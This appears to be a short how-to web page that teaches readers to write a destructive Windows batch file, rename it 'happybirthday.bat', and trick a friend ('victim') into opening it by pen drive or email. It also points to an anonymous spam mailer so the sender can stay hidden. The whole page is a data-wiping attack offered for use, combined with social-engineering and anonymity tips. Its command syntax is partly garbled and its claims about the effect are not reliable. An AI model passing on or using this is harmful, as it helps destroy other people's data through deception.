Here Im gonna show you how to create a virus which is really dangerous that it can destro your friends PC or laptop.The following are the steps that will show your how to destroy your friends computer

Step 1: Open Notepad and Copy the Following code in Notepad.

Picture of Open Notepad and Copy the Following code in Notepad.
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@Echo off
Del C:\ *.* |y

   2. Save this file as happybirthday.bat (Name can be anything but .bat is must)

Step 2: Give it to Victim

Picture of Give it to Victim
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will delete all the contents of the " C " Drive so that your friend cannot boot his computer.
Or send it to his mail.
There are lot of spam mailer are there.
I t will help you to send mail from others mail.
so that the sender can stay anonymous.

                                  Click here to go to the spam mailer


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